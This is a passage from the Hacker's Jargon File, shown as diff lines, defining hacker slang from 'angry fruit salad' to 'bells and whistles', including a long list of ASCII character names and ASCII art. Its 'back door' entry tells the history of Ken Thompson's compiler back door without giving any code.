by + typographers are actually taller than a less-than or greater-than + sign. + See {broket}, {{ASCII}}. + +:angry fruit salad: n. A bad visual-interface design that uses too + many colors. This derives, of course, from the bizarre day-glo + colors found in canned fruit salad. Too often one sees similar + effects from interface designers using color window systems such as + {X}; there is a tendency to create displays that are flashy and + attention-getting but uncomfortable for long-term use. + +:annoybot: /*-noy-bot/ [IRC] n. See {robot}. + +:AOS: 1. /aws/ (East Coast), /ay-os/ (West Coast) [based on a + PDP-10 increment instruction] vt.,obs. To increase the amount of + something. "AOS the campfire." Usage: considered silly, and now + obsolete. Now largely supplanted by {bump}. See {SOS}. 2. A + {{Multics}}-derived OS supported at one time by Data General. This + was pronounced /A-O-S/ or /A-os/. A spoof of the standard + AOS system administrator's manual (`How to Load and Generate + your AOS System') was created, issued a part number, and circulated + as photocopy folklore. It was called `How to Goad and + Levitate your CHAOS System'. 3. Algebraic Operating System, in + reference to those calculators which use infix instead of postfix + (reverse Polish) notation. + + Historical note: AOS in sense 1 was the name of a {PDP-10} + instruction that took any memory location in the computer and added + 1 to it; AOS meant `Add One and do not Skip'. Why, you may ask, + does the `S' stand for `do not Skip' rather than for `Skip'? Ah, + here was a beloved piece of PDP-10 folklore. There were eight such + instructions: AOSE added 1 and then skipped the next instruction + if the result was Equal to zero; AOSG added 1 and then skipped if + the result was Greater than 0; AOSN added 1 and then skipped + if the result was Not 0; AOSA added 1 and then skipped Always; + and so on. Just plain AOS didn't say when to skip, so it never + skipped. + + For similar reasons, AOJ meant `Add One and do not Jump'. Even + more bizarre, SKIP meant `do not SKIP'! If you wanted to skip the + next instruction, you had to say `SKIPA'. Likewise, JUMP meant + `do not JUMP'; the unconditional form was JUMPA. However, hackers + never did this. By some quirk of the 10's design, the {JRST} + (Jump and ReSTore flag with no flag specified) was actually faster + and so was invariably used. Such were the perverse mysteries of + assembler programming. + +:app: /ap/ n. Short for `application program', as opposed to a + systems program. What systems vendors are forever chasing + developers to create for their environments so they can sell more + boxes. Hackers tend not to think of the things they themselves run + as apps; thus, in hacker parlance the term excludes compilers, + program editors, games, and messaging systems, though a user would + consider all those to be apps. Oppose {tool}, {operating + system}. + +:arc: [primarily MSDOS] vt. To create a compressed {archive} from a + group of files using SEA ARC, PKWare PKARC, or a compatible + program. Rapidly becoming obsolete as the ARC compression method + is falling into disuse, having been replaced by newer compression + techniques. See {tar and feather}, {zip}. + +:arc wars: [primarily MSDOS] n. {holy wars} over which archiving + program one should use. The first arc war was sparked when System + Enhancement Associates (SEA) sued PKWare for copyright and + trademark infringement on its ARC program. PKWare's PKARC + outperformed ARC on both compression and speed while largely + retaining compatibility (it introduced a new compression type that + could be disabled for backward-compatibility). PKWare settled out + of court to avoid enormous legal costs (both SEA and PKWare are + small companies); as part of the settlement, the name of PKARC was + changed to PKPAK. The public backlash against SEA for bringing + suit helped to hasten the demise of ARC as a standard when PKWare + and others introduced new, incompatible archivers with better + compression algorithms. + +:archive: n. 1. A collection of several files bundled into one file + by a program such as `ar(1)', `tar(1)', `cpio(1)', + or {arc} for shipment or archiving (sense 2). See also {tar + and feather}. 2. A collection of files or archives (sense 1) made + available from an `archive site' via {FTP} or an email server. + +:arena: [UNIX] n. The area of memory attached to a process by + `brk(2)' and `sbrk(2)' and used by `malloc(3)' as + dynamic storage. So named from a semi-mythical `malloc: + corrupt arena' message supposedly emitted when some early versions + became terminally confused. See {overrun screw}, {aliasing + bug}, {memory leak}, {memory smash}, {smash the stack}. + +:arg: /arg/ n. Abbreviation for `argument' (to a function), + used so often as to have become a new word (like `piano' from + `pianoforte'). "The sine function takes 1 arg, but the + arc-tangent function can take either 1 or 2 args." Compare + {param}, {parm}, {var}. + +:armor-plated: n. Syn. for {bulletproof}. + +:asbestos: adj. Used as a modifier to anything intended to protect + one from {flame}s. Important cases of this include {asbestos + longjohns} and {asbestos cork award}, but it is used more + generally. + +:asbestos cork award: n. Once, long ago at MIT, there was a {flamer} + so consistently obnoxious that another hacker designed, had made, + and distributed posters announcing that said flamer had been + nominated for the `asbestos cork award'. Persons in any doubt as + to the intended application of the cork should consult the + etymology under {flame}. Since then, it is agreed that only a + select few have risen to the heights of bombast required to earn + this dubious dignity --- but there is no agreement on *which* + few. + +:asbestos longjohns: n. Notional garments often donned by {USENET} + posters just before emitting a remark they expect will elicit + {flamage}. This is the most common of the {asbestos} coinages. + Also `asbestos underwear', `asbestos overcoat', etc. + +:ASCII:: [American Standard Code for Information Interchange] + /as'kee/ n. The predominant character set encoding of present-day + computers. Uses 7 bits for each character, whereas most earlier + codes (including an early version of ASCII) used fewer. This + change allowed the inclusion of lowercase letters --- a major + {win} --- but it did not provide for accented letters or any + other letterforms not used in English (such as the German sharp-S + and the ae-ligature + which is a letter in, for example, Norwegian). It could be worse, + though. It could be much worse. See {{EBCDIC}} to understand how. + + Computers are much pickier and less flexible about spelling than + humans; thus, hackers need to be very precise when talking about + characters, and have developed a considerable amount of verbal + shorthand for them. Every character has one or more names --- some + formal, some concise, some silly. Common jargon names for ASCII + characters are collected here. See also individual entries for + {bang}, {excl}, {open}, {ques}, {semi}, {shriek}, + {splat}, {twiddle}, and {Yu-Shiang Whole Fish}. + + This list derives from revision 2.3 of the USENET ASCII + pronunciation guide. Single characters are listed in ASCII order; + character pairs are sorted in by first member. For each character, + common names are given in rough order of popularity, followed by + names that are reported but rarely seen; official ANSI/CCITT names + are surrounded by brokets: <>. Square brackets mark the + particularly silly names introduced by {INTERCAL}. Ordinary + parentheticals provide some usage information. + + ! + Common: {bang}; pling; excl; shriek; . + Rare: factorial; exclam; smash; cuss; boing; yell; wow; hey; + wham; eureka; [spark-spot]; soldier. + + " + Common: double quote; quote. Rare: literal mark; + double-glitch; ; ; dirk; + [rabbit-ears]; double prime. + + # + Common: ; pound; pound sign; hash; sharp; + {crunch}; hex; [mesh]; octothorpe. Rare: flash; crosshatch; + grid; pig-pen; tictactoe; scratchmark; thud; thump; {splat}. + + $ + Common: dollar; . Rare: currency symbol; buck; + cash; string (from BASIC); escape (when used as the echo of + ASCII ESC); ding; cache; [big money]. + + % + Common: percent; ; mod; grapes. Rare: + [double-oh-seven]. + + & + Common: ; amper; and. Rare: address (from C); + reference (from C++); andpersand; bitand; background (from + `sh(1)'); pretzel; amp. [INTERCAL called this `ampersand'; + what could be sillier?] + + ' + Common: single quote; quote; . Rare: prime; + glitch; tick; irk; pop; [spark]; ; . + + () + Common: left/right paren; left/right parenthesis; left/right; + paren/thesis; open/close paren; open/close; open/close + parenthesis; left/right banana. Rare: so/al-ready; + lparen/rparen; ; open/close round + bracket, parenthisey/unparenthisey; [wax/wane]; left/right + ear. + + * + Common: star; [{splat}]; . Rare: wildcard; gear; + dingle; mult; spider; aster; times; twinkle; glob (see + {glob}); {Nathan Hale}. + + + + Common: ; add. Rare: cross; [intersection]. + + , + Common: . Rare: ; [tail]. + + - + Common: dash; ; . Rare: [worm]; option; dak; + bithorpe. + + . + Common: dot; point; ; . Rare: radix + point; full stop; [spot]. + + / + Common: slash; stroke; ; forward slash. Rare: + diagonal; solidus; over; slak; virgule; [slat]. + + : + Common: . Rare: dots; [two-spot]. + + ; + Common: ; semi. Rare: weenie; [hybrid], + pit-thwong. + + <> + Common: ; left/right angle bracket; + bra/ket; left/right broket. Rare: from/{into, towards}; read + from/write to; suck/blow; comes-from/gozinta; in/out; + crunch/zap (all from UNIX); [angle/right angle]. + + = + Common: ; gets; takes. Rare: quadrathorpe; + [half-mesh]. + + ? + Common: query; ; {ques}. Rare: whatmark; + [what]; wildchar; huh; hook; buttonhook; hunchback. + + @ + Common: at sign; at; strudel. Rare: each; vortex; whorl; + [whirlpool]; cyclone; snail; ape; cat; rose; cabbage; + . + + V + Rare: [book]. + + [] + Common: left/right square bracket; ; + bracket/unbracket; left/right bracket. Rare: square/unsquare; + [U turn/U turn back]. + + \ + Common: backslash; escape (from C/UNIX); reverse slash; slosh; + backslant; backwhack. Rare: bash; ; reversed + virgule; [backslat]. + + ^ + Common: hat; control; uparrow; caret; . Rare: + chevron; [shark (or shark-fin)]; to the (`to the power of'); + fang; pointer (in Pascal). + + _ + Common: ; underscore; underbar; under. Rare: + score; backarrow; skid; [flatworm]. + + ` + Common: backquote; left quote; left single quote; open quote; + ; grave. Rare: backprime; [backspark]; + unapostrophe; birk; blugle; back tick; back glitch; push; + ; quasiquote. + + {} + Common: open/close brace; left/right brace; left/right + squiggly; left/right squiggly bracket/brace; left/right curly + bracket/brace; . Rare: brace/unbrace; + curly/uncurly; leftit/rytit; left/right squirrelly; + [embrace/bracelet]. + + | + Common: bar; or; or-bar; v-bar; pipe; vertical bar. Rare: + ; gozinta; thru; pipesinta (last three from + UNIX); [spike]. + + ~ + Common: ; squiggle; {twiddle}; not. Rare: approx; + wiggle; swung dash; enyay; [sqiggle (sic)]. + + The pronunciation of `#' as `pound' is common in the U.S. + but a bad idea; {{Commonwealth Hackish}} has its own, rather more + apposite use of `pound sign' (confusingly, on British keyboards + the pound graphic + happens to replace `#'; thus Britishers sometimes + call `#' on a U.S.-ASCII keyboard `pound', compounding the + American error). The U.S. usage derives from an old-fashioned + commercial practice of using a `#' suffix to tag pound weights + on bills of lading. The character is usually pronounced `hash' + outside the U.S. + + The `uparrow' name for circumflex and `leftarrow' name for + underline are historical relics from archaic ASCII (the 1963 + version), which had these graphics in those character positions + rather than the modern punctuation characters. + + The `swung dash' or `approximation' sign is not quite the same + as tilde in typeset material + but the ASCII tilde serves for both (compare {angle + brackets}). + + Some other common usages cause odd overlaps. The `#', + `$', `>', and `&' characters, for example, are all + pronounced "hex" in different communities because various + assemblers use them as a prefix tag for hexadecimal constants (in + particular, `#' in many assembler-programming cultures, + `$' in the 6502 world, `>' at Texas Instruments, and + `&' on the BBC Micro, Sinclair, and some Z80 machines). See + also {splat}. + + The inability of ASCII text to correctly represent any of the + world's other major languages makes the designers' choice of 7 bits + look more and more like a serious {misfeature} as the use of + international networks continues to increase (see {software + rot}). Hardware and software from the U.S. still tends to embody + the assumption that ASCII is the universal character set; this is a + a major irritant to people who want to use a character set suited + to their own languages. Perversely, though, efforts to solve this + problem by proliferating `national' character sets produce an + evolutionary pressure to use a *smaller* subset common to all + those in use. + +:ASCII art: n. The fine art of drawing diagrams using the ASCII + character set (mainly `|', `-', `/', `\', and + `+'). Also known as `character graphics' or `ASCII + graphics'; see also {boxology}. Here is a serious example: + + + o----)||(--+--|<----+ +---------o + D O + L )||( | | | C U + A I )||( +-->|-+ | +-\/\/-+--o - T + C N )||( | | | | P + E )||( +-->|-+--)---+--)|--+-o U + )||( | | | GND T + o----)||(--+--|<----+----------+ + + A power supply consisting of a full + wave rectifier circuit feeding a + capacitor input filter circuit + + Figure 1. + + And here are some very silly examples: + + + |\/\/\/| ____/| ___ |\_/| ___ + | | \ o.O| ACK! / \_ |` '| _/ \ + | | =(_)= THPHTH! / \/ \/ \ + | (o)(o) U / \ + C _) (__) \/\/\/\ _____ /\/\/\/ + | ,___| (oo) \/ \/ + | / \/-------\ U (__) + /____\ || | \ /---V `v'- oo ) + / \ ||---W|| * * |--| || |`. |_/\ + + Figure 2. + + There is an important subgenre of humorous ASCII art that takes + advantage of the names of the various characters to tell a + pun-based joke. + + +--------------------------------------------------------+ + | ^^^^^^^^^^^^ | + | ^^^^^^^^^^^ ^^^^^^^^^ | + | ^^^^^^^^^^^^^ ^^^^^^^^^^^^^ | + | ^^^^^^^ B ^^^^^^^^^ | + | ^^^^^^^^^ ^^^ ^^^^^^^^^^^^^^ | + +--------------------------------------------------------+ + " A Bee in the Carrot Patch " + + Figure 3. + + Within humorous ASCII art, there is for some reason an entire + flourishing subgenre of pictures of silly cows. Four of these are + reproduced in Figure 2; here are three more: + + + (__) (__) (__) + (\/) ($$) (**) + /-------\/ /-------\/ /-------\/ + / | 666 || / |=====|| / | || + * ||----|| * ||----|| * ||----|| + ~~ ~~ ~~ ~~ ~~ ~~ + Satanic cow This cow is a Yuppie Cow in love + + Figure 4. + +:attoparsec: n. `atto-' is the standard SI prefix for + multiplication by 10^(-18). A parsec (parallax-second) is + 3.26 light-years; an attoparsec is thus 3.26 * 10^(-18) light + years, or about 3.1 cm (thus, 1 attoparsec/{microfortnight} + equals about 1 inch/sec). This unit is reported to be in use + (though probably not very seriously) among hackers in the U.K. See + {micro-}. + +:autobogotiphobia: /aw'to-boh-got`*-foh'bee-*/ n. See {bogotify}. + +:automagically: /aw-toh-maj'i-klee/ or /aw-toh-maj'i-k*l-ee/ adv. + Automatically, but in a way that, for some reason (typically + because it is too complicated, or too ugly, or perhaps even too + trivial), the speaker doesn't feel like explaining to you. See + {magic}. "The C-INTERCAL compiler generates C, then automagically + invokes `cc(1)' to produce an executable." + +:avatar: [CMU, Tektronix] n. Syn. {root}, {superuser}. There + are quite a few UNIX machines on which the name of the superuser + account is `avatar' rather than `root'. This quirk was + originated by a CMU hacker who disliked the term `superuser', + and was propagated through an ex-CMU hacker at Tektronix. + +:awk: 1. n. [UNIX techspeak] An interpreted language for massaging + text data developed by Alfred Aho, Peter Weinberger, and Brian + Kernighan (the name is from their initials). It is characterized + by C-like syntax, a declaration-free approach to variable typing + and declarations, associative arrays, and field-oriented text + processing. See also {Perl}. 2. n. Editing term for an + expression awkward to manipulate through normal {regexp} + facilities (for example, one containing a {newline}). 3. vt. To + process data using `awk(1)'. + += B = +===== + +:back door: n. A hole in the security of a system deliberately left + in place by designers or maintainers. The motivation for this is + not always sinister; some operating systems, for example, come out + of the box with privileged accounts intended for use by field + service technicians or the vendor's maintenance programmers. + + Historically, back doors have often lurked in systems longer than + anyone expected or planned, and a few have become widely known. + The infamous {RTM} worm of late 1988, for example, used a back door + in the {BSD} UNIX `sendmail(8)' utility. + + Ken Thompson's 1983 Turing Award lecture to the ACM revealed the + existence of a back door in early UNIX versions that may have + qualified as the most fiendishly clever security hack of all time. + The C compiler contained code that would recognize when the + `login' command was being recompiled and insert some code + recognizing a password chosen by Thompson, giving him entry to the + system whether or not an account had been created for him. + + Normally such a back door could be removed by removing it from the + source code for the compiler and recompiling the compiler. But to + recompile the compiler, you have to *use* the compiler --- so + Thompson also arranged that the compiler would *recognize when + it was compiling a version of itself*, and insert into the + recompiled compiler the code to insert into the recompiled `login' + the code to allow Thompson entry --- and, of course, the code to + recognize itself and do the whole thing again the next time around! + And having done this once, he was then able to recompile the + compiler from the original sources, leaving his back door in place + and active but with no trace in the sources. + + The talk that revealed this truly moby hack was published as + "Reflections on Trusting Trust", `Communications of the + ACM 27', 8 (August 1984), pp. 761--763. + + Syn. {trap door}; may also be called a `wormhole'. See also + {iron box}, {cracker}, {worm}, {logic bomb}. + +:backbone cabal: n. A group of large-site administrators who pushed + through the {Great Renaming} and reined in the chaos of {USENET} + during most of the 1980s. The cabal {mailing list} disbanded in + late 1988 after a bitter internal catfight, but the net hardly +noticed. + +:backbone site: n. A key USENET and email site; one that processes + a large amount of third-party traffic, especially if it is the home + site of any of the regional coordinators for the USENET maps. + Notable backbone sites as of early 1991 include uunet and the + mail machines at Rutgers University, UC Berkeley, DEC's Western + Research Laboratories, Ohio State University, and the University of + Texas. Compare {rib site}, {leaf site}. + +:backgammon:: See {bignum}, {moby}, and {pseudoprime}. + +:background: n.,adj.,vt. To do a task `in background' is to do + it whenever {foreground} matters are not claiming your undivided + attention, and `to background' something means to relegate it to + a lower priority. "For now, we'll just print a list of nodes and + links; I'm working on the graph-printing problem in background." + Note that this implies ongoing activity but at a reduced level or + in spare time, in contrast to mainstream `back burner' (which + connotes benign neglect until some future resumption of activity). + Some people prefer to use the term for processing that they have + queued up for their unconscious minds (a tack that one can often + fruitfully take upon encountering an obstacle in creative work). + Compare {amp off}, {slopsucker}. + + Technically, a task running in background is detached from the + terminal where it was started (and often running at a lower + priority); oppose {foreground}. Nowadays this term is primarily + associated with {{UNIX}}, but it appears to have been first used + in this sense on OS/360. + +:backspace and overstrike: interj. Whoa! Back up. Used to suggest + that someone just said or did something wrong. Common among + APL programmers. + +:backward combatability: /bak'w*rd k*m-bat'*-bil'*-tee/ [from + `backward compatibility'] n. A property of hardware or software + revisions in which previous protocols, formats, and layouts are + discarded in favor of `new and improved' protocols, formats, and + layouts. Occurs usually when making the transition between major + releases. When the change is so drastic that the old formats are + not retained in the new version, it is said to be `backward + combatable'. See {flag day}. + +:BAD: /B-A-D/ [IBM: acronym, `Broken As Designed'] adj. Said + of a program that is {bogus} because of bad design and misfeatures + rather than because of bugginess. See {working as designed}. + +:Bad Thing: [from the 1930 Sellar & Yeatman parody `1066 And + All That'] n. Something that can't possibly result in improvement + of the subject. This term is always capitalized, as in "Replacing + all of the 9600-baud modems with bicycle couriers would be a Bad + Thing". Oppose {Good Thing}. British correspondents confirm + that {Bad Thing} and {Good Thing} (and prob. therefore {Right + Thing} and {Wrong Thing}) come from the book referenced in the + etymology, which discusses rulers who were Good Kings but Bad + Things. This has apparently created a mainstream idiom on the + British side of the pond. + +:bag on the side: n. An extension to an established hack that is + supposed to add some functionality to the original. Usually + derogatory, implying that the original was being overextended and + should have been thrown away, and the new product is ugly, + inelegant, or bloated. Also v. phrase, `to hang a bag on the side + [of]'. "C++? That's just a bag on the side of C ...." + "They want me to hang a bag on the side of the accounting + system." + +:bagbiter: /bag'bi:t-*r/ n. 1. Something, such as a program or a + computer, that fails to work, or works in a remarkably clumsy + manner. "This text editor won't let me make a file with a line + longer than 80 characters! What a bagbiter!" 2. A person who has + caused you some trouble, inadvertently or otherwise, typically by + failing to program the computer properly. Synonyms: {loser}, + {cretin}, {chomper}. 3. adj. `bagbiting' Having the + quality of a bagbiter. "This bagbiting system won't let me + compute the factorial of a negative number." Compare {losing}, + {cretinous}, {bletcherous}, `barfucious' (under + {barfulous}) and `chomping' (under {chomp}). 4. `bite + the bag' vi. To fail in some manner. "The computer keeps crashing + every 5 minutes." "Yes, the disk controller is really biting the + bag." The original loading of these terms was almost undoubtedly + obscene, possibly referring to the scrotum, but in their current + usage they have become almost completely sanitized. + + A program called Lexiphage on the old MIT AI PDP-10 would draw on + a selected victim's bitmapped terminal the words "THE BAG" in + ornate letters, and then a pair of jaws biting pieces of it off. + This is the first and to date only known example of a program + *intended* to be a bagbiter. + +:bamf: /bamf/ 1. [from old X-Men comics] interj. Notional sound + made by a person or object teleporting in or out of the hearer's + vicinity. Often used in {virtual reality} (esp. {MUD}) + electronic {fora} when a character wishes to make a dramatic + entrance or exit. 2. The sound of magical transformation, used in + virtual reality {fora} like sense 1. 3. [from `Don + Washington's Survival Guide'] n. Acronym for `Bad-Ass Mother + Fucker', used to refer to one of the handful of nastiest monsters + on an LPMUD or other similar MUD. + +:banana label: n. The labels often used on the sides of {macrotape} + reels, so called because they are shaped roughly like blunt-ended + bananas. This term, like macrotapes themselves, is still current + but visibly headed for obsolescence. + +:banana problem: n. [from the story of the little girl who said "I + know how to spell `banana', but I don't know when to stop"]. Not + knowing where or when to bring a production to a close (compare + {fencepost error}). One may say `there is a banana problem' of an + algorithm with poorly defined or incorrect termination conditions, + or in discussing the evolution of a design that may be succumbing + to featuritis (see also {creeping elegance}, {creeping + featuritis}). See item 176 under {HAKMEM}, which describes a + banana problem in a {Dissociated Press} implementation. Also, + see {one-banana problem} for a superficially similar but + unrelated usage. + +:bandwidth: n. 1. Used by hackers in a generalization of its + technical meaning as the volume of information per unit time that a + computer, person, or transmission medium can handle. "Those are + amazing graphics, but I missed some of the detail --- not enough + bandwidth, I guess." Compare {low-bandwidth}. 2. Attention + span. 3. On {USENET}, a measure of network capacity that is + often wasted by people complaining about how items posted by others + are a waste of bandwidth. + +:bang: 1. n. Common spoken name for `!' (ASCII 0100001), + especially when used in pronouncing a {bang path} in spoken + hackish. In {elder days} this was considered a CMUish usage, + with MIT and Stanford hackers preferring {excl} or {shriek}; + but the spread of UNIX has carried `bang' with it (esp. via the + term {bang path}) and it is now certainly the most common spoken + name for `!'. Note that it is used exclusively for + non-emphatic written `!'; one would not say "Congratulations + bang" (except possibly for humorous purposes), but if one wanted + to specify the exact characters `foo!' one would speak "Eff oh oh + bang". See {shriek}, {{ASCII}}. 2. interj. An exclamation + signifying roughly "I have achieved enlightenment!", or "The + dynamite has cleared out my brain!" Often used to acknowledge + that one has perpetrated a {thinko} immediately after one has + been called on it. + +:bang on: vt. To stress-test a piece of hardware or software: "I + banged on the new version of the simulator all day yesterday and it + didn't crash once. I guess it is ready for release." The term + {pound on} is synonymous. + +:bang path: n. An old-style UUCP electronic-mail address specifying + hops to get from some assumed-reachable location to the addressee, + so called because each {hop} is signified by a {bang} sign. + Thus, for example, the path ...!bigsite!foovax!barbox!me + directs people to route their mail to machine bigsite (presumably + a well-known location accessible to everybody) and from there + through the machine foovax to the account of user me on + barbox. + + In the bad old days of not so long ago, before autorouting mailers + became commonplace, people often published compound bang addresses + using the { } convention (see {glob}) to give paths from + *several* big machines, in the hopes that one's correspondent + might be able to get mail to one of them reliably (example: + ...!{seismo, ut-sally, ihnp4}!rice!beta!gamma!me). Bang paths + of 8 to 10 hops were not uncommon in 1981. Late-night dial-up + UUCP links would cause week-long transmission times. Bang paths + were often selected by both transmission time and reliability, as + messages would often get lost. See {{Internet address}}, + {network, the}, and {sitename}. + +:banner: n. 1. The title page added to printouts by most print + spoolers (see {spool}). Typically includes user or account ID + information in very large character-graphics capitals. Also called + a `burst page', because it indicates where to burst (tear apart) + fanfold paper to separate one user's printout from the next. 2. A + similar printout generated (typically on multiple pages of fan-fold + paper) from user-specified text, e.g., by a program such as UNIX's + `banner({1,6})'. 3. On interactive software, a first screen + containing a logo and/or author credits and/or a copyright notice. + +:bar: /bar/ n. 1. The second {metasyntactic variable}, after {foo} + and before {baz}. "Suppose we have two functions: FOO and BAR. + FOO calls BAR...." 2. Often appended to {foo} to produce + {foobar}. + +:bare metal: n. 1. New computer hardware, unadorned with such + snares and delusions as an {operating system}, an {HLL}, or + even assembler. Commonly used in the phrase `programming on the + bare metal', which refers to the arduous work of {bit bashing} + needed to create these basic tools for a new machine. Real + bare-metal programming involves things like building boot proms and + BIOS chips, implementing basic monitors used to test device + drivers, and writing the assemblers that will be used to write the + compiler back ends that will give the new machine a real + development environment. 2. `Programming on the bare metal' is + also used to describe a style of {hand-hacking} that relies on + bit-level peculiarities of a particular hardware design, esp. + tricks for speed and space optimization that rely on crocks such as + overlapping instructions (or, as in the famous case described in + {The Story of Mel, a Real Programmer} (in {appendix A}), + interleaving of opcodes on a magnetic drum to minimize fetch delays + due to the device's rotational latency). This sort of thing has + become less common as the relative costs of programming time and + machine resources have changed, but is still found in heavily + constrained environments such as industrial embedded systems. See + {real programmer}. + + In the world of personal computing, bare metal programming + (especially in sense 1 but sometimes also in sense 2) is often + considered a {Good Thing}, or at least a necessary evil + (because these machines have often been sufficiently slow and + poorly designed to make it necessary; see {ill-behaved}). + There, the term usually refers to bypassing the BIOS or OS + interface and writing the application to directly access device + registers and machine addresses. "To get 19.2 kilobaud on the + serial port, you need to get down to the bare metal." People who + can do this sort of thing are held in high regard. + +:barf: /barf/ [from mainstream slang meaning `vomit'] + 1. interj. Term of disgust. This is the closest hackish + equivalent of the Val\-speak "gag me with a spoon". (Like, euwww!) + See {bletch}. 2. vi. To say "Barf!" or emit some similar + expression of disgust. "I showed him my latest hack and he + barfed" means only that he complained about it, not that he + literally vomited. 3. vi. To fail to work because of unacceptable + input. May mean to give an error message. Examples: "The + division operation barfs if you try to divide by 0." (That is, + the division operation checks for an attempt to divide by zero, and + if one is encountered it causes the operation to fail in some + unspecified, but generally obvious, manner.) "The text editor + barfs if you try to read in a new file before writing out the old + one." See {choke}, {gag}. In Commonwealth hackish, + `barf' is generally replaced by `puke' or `vom'. {barf} + is sometimes also used as a {metasyntactic variable}, like {foo} or + {bar}. + +:barfmail: n. Multiple {bounce message}s accumulating to the + level of serious annoyance, or worse. The sort of thing that + happens when an inter-network mail gateway goes down or + wonky. + +:barfulation: /bar`fyoo-lay'sh*n/ interj. Variation of {barf} + used around the Stanford area. An exclamation, expressing disgust. + On seeing some particularly bad code one might exclaim, + "Barfulation! Who wrote this, Quux?" + +:barfulous: /bar'fyoo-l*s/ adj. (alt. `barfucious', + /bar-fyoo-sh*s/) Said of something that would make anyone barf, + if only for esthetic reasons. + +:barney: n. In Commonwealth hackish, `barney' is to {fred} + (sense #1) as {bar} is to {foo}. That is, people who + commonly use `fred' as their first metasyntactic variable will + often use `barney' second. The reference is, of course, to Fred + Flintstone and Barney Rubble in the Flintstones cartoons. + +:baroque: adj. Feature-encrusted; complex; gaudy; verging on + excessive. Said of hardware or (esp.) software designs, this has + many of the connotations of {elephantine} or {monstrosity} but is + less extreme and not pejorative in itself. "Metafont even has + features to introduce random variations to its letterform output. + Now *that* is baroque!" See also {rococo}. + +:BartleMUD: /bar'tl-muhd/ n. Any of the MUDs derived from the + original MUD game by Richard Bartle and Roy Trubshaw (see + {MUD}). BartleMUDs are noted for their (usually slightly + offbeat) humor, dry but friendly syntax, and lack of adjectives in + object descriptions, so a player is likely to come across + `brand172', for instance (see {brand brand brand}). Bartle has + taken a bad rap in some MUDding circles for supposedly originating + this term, but (like the story that MUD is a trademark) this + appears to be a myth; he uses `MUD1'. + +:BASIC: n. A programming language, originally designed for + Dartmouth's experimental timesharing system in the early 1960s, + which has since become the leading cause of brain-damage in + proto-hackers. This is another case (like {Pascal}) of the bad + things that happen when a language deliberately designed as an + educational toy gets taken too seriously. A novice can write short + BASIC programs (on the order of 10--20 lines) very easily; writing + anything longer is (a) very painful, and (b) encourages bad habits + that will bite him/her later if he/she tries to hack in a real + language. This wouldn't be so bad if historical accidents hadn't + made BASIC so common on low-end micros. As it is, it ruins + thousands of potential wizards a year. + +:batch: adj. 1. Non-interactive. Hackers use this somewhat more + loosely than the traditional technical definitions justify; in + particular, switches on a normally interactive program that prepare + it to receive non-interactive command input are often referred to + as `batch mode' switches. A `batch file' is a series of + instructions written to be handed to an interactive program running + in batch mode. 2. Performance of dreary tasks all at one sitting. + "I finally sat down in batch mode and wrote out checks for all + those bills; I guess they'll turn the electricity back on next + week..." 3. Accumulation of a number of small tasks that can be + lumped together for greater efficiency. "I'm batching up those + letters to send sometime" "I'm batching up bottles to take to the + recycling center." + +:bathtub curve: n. Common term for the curve (resembling an + end-to-end section of one of those claw-footed antique bathtubs) + that describes the expected failure rate of electronics with time: + initially high, dropping to near 0 for most of the system's + lifetime, then rising again as it `tires out'. See also {burn-in + period}, {infant mortality}. + +:baud: /bawd/ [simplified from its technical meaning] n. Bits per + second. Hence kilobaud or Kbaud, thousands of bits per second. + The technical meaning is `level transitions per second'; this + coincides with bps only for two-level modulation with no framing or + stop bits. Most hackers are aware of these nuances but blithely + ignore them. + + Histotical note: this was originally a unit of telegraph signalling + speed, set at one pulse per second. It was proposed at the + International Telegraph Conference of 1927, and named after J.M.E. + Baudot (1845-1903), the French engineer who constructed the first + successful teleprinter. + +:baud barf: /bawd barf/ n. The garbage one gets on the monitor + when using a modem connection with some protocol setting (esp. + line speed) incorrect, or when someone picks up a voice extension + on the same line, or when really bad line noise disrupts the + connection. Baud barf is not completely {random}, by the way; + hackers with a lot of serial-line experience can usually tell + whether the device at the other end is expecting a higher or lower + speed than the terminal is set to. *Really* experienced ones + can identify particular speeds. + +:baz: /baz/ n. 1. The third {metasyntactic variable} "Suppose we + have three functions: FOO, BAR, and BAZ. FOO calls BAR, which + calls BAZ...." (See also {fum}) 2. interj. A term of mild + annoyance. In this usage the term is often drawn out for 2 or 3 + seconds, producing an effect not unlike the bleating of a sheep; + /baaaaaaz/. 3. Occasionally appended to {foo} to produce + `foobaz'. + + Earlier versions of this lexicon derived `baz' as a Stanford + corruption of {bar}. However, Pete Samson (compiler of the + {TMRC} lexicon) reports it was already current when he joined TMRC + in 1958. He says "It came from `Pogo'. Albert the Alligator, + when vexed or outraged, would shout `Bazz Fazz!' or `Rowrbazzle!' + The club layout was said to model the (mythical) New England + counties of Rowrfolk and Bassex (Rowrbazzle mingled with + (Norfolk/Suffolk/Middlesex/Essex)." + +:bboard: /bee'bord/ [contraction of `bulletin board'] n. + 1. Any electronic bulletin board; esp. used of {BBS} systems + running on personal micros, less frequently of a USENET + {newsgroup} (in fact, use of the term for a newsgroup generally + marks one either as a {newbie} fresh in from the BBS world or as + a real old-timer predating USENET). 2. At CMU and other colleges + with similar facilities, refers to campus-wide electronic bulletin + boards. 3. The term `physical bboard' is sometimes used to + refer to a old-fashioned, non-electronic cork memo board. At CMU, + it refers to a particular one outside the CS Lounge. + + In either of senses 1 or 2, the term is usually prefixed by the + name of the intended board (`the Moonlight Casino bboard' or + `market bboard'); however, if the context is clear, the better-read + bboards may be referred to by name alone, as in (at CMU) "Don't + post for-sale ads on general". + +:BBS: /B-B-S/ [abbreviation, `Bulletin Board System'] n. An electronic + bulletin board system; that is, a message database where people can + log in and leave broadcast messages for others grouped (typically) + into {topic group}s. Thousands of local BBS systems are in + operation throughout the U.S., typically run by amateurs for fun + out of their homes on MS-DOS boxes with a single modem line each. + Fans of USENET and Internet or the big commercial timesharing + bboards such as CompuServe and GEnie tend to consider local BBSes + the low-rent district of the hacker culture, but they serve a + valuable function by knitting together lots of hackers and users in + the personal-micro world who would otherwise be unable to exchange + code at all. + +:beam: [from Star Trek Classic's "Beam me up, Scotty!"] vt. To + transfer {softcopy} of a file electronically; most often in + combining forms such as `beam me a copy' or `beam that over to + his site'. Compare {blast}, {snarf}, {BLT}. + +:beanie key: [Mac users] n. See {command key}. + +:beep: n.,v. Syn. {feep}. This term seems to be preferred among micro + hobbyists. + +:beige toaster: n. A Macintosh. See {toaster}; compare + {Macintrash}, {maggotbox}. + +:bells and whistles: [by analogy with the toyboxes on theater + organs] n. Features added to a program or system to make it more + {flavorful} from a hacker's point of view, without necessarily + adding to its utility for its primary function. Distinguished from + 